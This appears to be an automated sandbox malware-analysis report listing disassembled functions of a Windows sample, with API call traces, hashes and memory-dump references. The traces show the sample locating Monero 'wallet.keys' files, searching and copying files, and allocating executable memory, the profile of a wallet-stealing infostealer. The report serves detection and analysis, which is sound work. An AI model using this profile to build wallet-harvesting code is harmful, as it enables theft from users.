Opcode ID: dfad0b396a9ba3524066659149d67c200719b60aaf37e573fe3c56eb5ef39f30
Instruction ID: 18c16bf456e0f91dff73f8a59bf57201a3d60ff64fcb124e449627a210885bb1
Opcode Fuzzy Hash: dfad0b396a9ba3524066659149d67c200719b60aaf37e573fe3c56eb5ef39f30
Instruction Fuzzy Hash: F7E1C1729101189BEB19FBA4CC92FEE7338BF94300F40415AF506A7191EF796A49CB76

Function 0097AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

lstrlen.KERNEL32(00000000), ref: 0097B16A
lstrlen.KERNEL32(00000000), ref: 0097B17E

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: ca6a3c0e7546dede52ad454090f4d9adf3aa30fef7b6ebda1d992ff4352d03a5
Instruction ID: 09c1c464a7a99def241a4da9b5bc48257fea96ba6be80348b222f34f6713e6e0
Opcode Fuzzy Hash: ca6a3c0e7546dede52ad454090f4d9adf3aa30fef7b6ebda1d992ff4352d03a5
Instruction Fuzzy Hash: D191EF729101149BEF04FBA4DC96FEE7338AF94300F40415AF516A7291EF786A09CB76

Function 0097B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

lstrlen.KERNEL32(00000000), ref: 0097B42E
lstrlen.KERNEL32(00000000), ref: 0097B442

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 625c46c80142b107a4122910cd14761c8ec87c4744de4ff8c0d3223ac9e2dbf8
Instruction ID: 39cbcc9a66f8ab73b8f759e8faf0b1ab1f662b2eee772e49febf505e05e12433
Opcode Fuzzy Hash: 625c46c80142b107a4122910cd14761c8ec87c4744de4ff8c0d3223ac9e2dbf8
Instruction Fuzzy Hash: C47112729101149BEF04FBA4DC96EEE7339BF94300F40455AF506A7291EF786A09CB76

Function 00984BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00988DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

lstrcat.KERNEL32(?,00000000), ref: 00984BEA
lstrcat.KERNEL32(?,0084D860), ref: 00984C08

Part of subcall function 00984910: wsprintfA.USER32 ref: 0098492C
Part of subcall function 00984910: FindFirstFileA.KERNEL32(?,?), ref: 00984943

Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,00990FDC), ref: 00984971
Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,00990FE0), ref: 00984987
Part of subcall function 00984910: FindNextFileA.KERNEL32(000000FF,?), ref: 00984B7D
Part of subcall function 00984910: FindClose.KERNEL32(000000FF), ref: 00984B92

Part of subcall function 00984910: wsprintfA.USER32 ref: 009849B0
Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,009908D2), ref: 009849C5
Part of subcall function 00984910: wsprintfA.USER32 ref: 009849E2
Part of subcall function 00984910: PathMatchSpecA.SHLWAPI(?,?), ref: 00984A1E
Part of subcall function 00984910: lstrcat.KERNEL32(?,0084EA88), ref: 00984A4A
Part of subcall function 00984910: lstrcat.KERNEL32(?,00990FF8), ref: 00984A5C
Part of subcall function 00984910: lstrcat.KERNEL32(?,?), ref: 00984A70
Part of subcall function 00984910: lstrcat.KERNEL32(?,00990FFC), ref: 00984A82
Part of subcall function 00984910: lstrcat.KERNEL32(?,?), ref: 00984A96
Part of subcall function 00984910: CopyFileA.KERNEL32(?,?,00000001), ref: 00984AAC
Part of subcall function 00984910: DeleteFileA.KERNEL32(?), ref: 00984B31

Part of subcall function 00984910: wsprintfA.USER32 ref: 00984A07

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 09cf84f4816c5625e12f417564bbe8e8928a5167f1c0f20c01a0eb4844a73e84
Instruction ID: bc30fc6324144d8fed0734a25491ccc54720487b95d1984cc1d4e59bb3f77aa2
Opcode Fuzzy Hash: 09cf84f4816c5625e12f417564bbe8e8928a5167f1c0f20c01a0eb4844a73e84
Instruction Fuzzy Hash: C941B9B79001046BCB54F7A4EC42FEE337DABC8700F408648B55957286FDB55B888BE2

Function 00976660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00976706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00976753

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85c6b2c169fbfd2e2c30f085c3a82efba213fa971e77d484f9bc7c6d8894eaf3
Instruction ID: cc9e34822d84aec8f7b296e17873932d87239295d750d8344c4778d6db820ff5
Opcode Fuzzy Hash: 85c6b2c169fbfd2e2c30f085c3a82efba213fa971e77d484f9bc7c6d8894eaf3
Instruction Fuzzy Hash: CD41D475A00609EFCB44CF98C494BADBBB1FB48354F24C6A9E84D9B341C735AA81CF84

Function 00985050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00988DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

lstrcat.KERNEL32(?,00000000), ref: 0098508A
lstrcat.KERNEL32(?,0084E5A8), ref: 009850A8

Part of subcall function 00984910: wsprintfA.USER32 ref: 0098492C
Part of subcall function 00984910: FindFirstFileA.KERNEL32(?,?), ref: 00984943

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 1a6a2ec92c5f92429db9029532e9238be83243a2d6ecc101028fec1186e58233
Instruction ID: addb3a33fc2137c3207c38f4c9c3fdb30e1e846a81db02ecc16b4069ffd539dd
Opcode Fuzzy Hash: 1a6a2ec92c5f92429db9029532e9238be83243a2d6ecc101028fec1186e58233
Instruction Fuzzy Hash: 8D01967690020867CB54FB74DC47FEE737CAB94700F404684B64997291EEB5AAC88BE2

Function 009710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009710B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009710F7

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c80b1248d7a7b1752385549b7a3c2291965ca0e42830446edd2d5b29ed437a90
Instruction ID: df70790fa273b91f101b91d97c1affa7ead4275492ef327ceb46a9976ef2c4ef
Opcode Fuzzy Hash: c80b1248d7a7b1752385549b7a3c2291965ca0e42830446edd2d5b29ed437a90
Instruction Fuzzy Hash: 67F0E272A41308BBE7149AA8AC59FABB7ECE705B15F304948F504E3280D9729E00CAA0

Function 00988D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00971B54,?,?,0099564C,?,?,00990E1F), ref: 00988D9F

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d6fb815f3e94a37a0279ed83980ec57e50aadbcb81424f425081a96a4b44f9ed
Instruction ID: 322b05adad621e598527ab45334ff0123b91030170c033c01cc8678cc5dbdf3a
Opcode Fuzzy Hash: d6fb815f3e94a37a0279ed83980ec57e50aadbcb81424f425081a96a4b44f9ed
Instruction Fuzzy Hash: 43F01570C00208EBDB04FFA4D5496DDBB78EB10310F50829AE866AB3C0DB786A45DB91

Function 00988DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
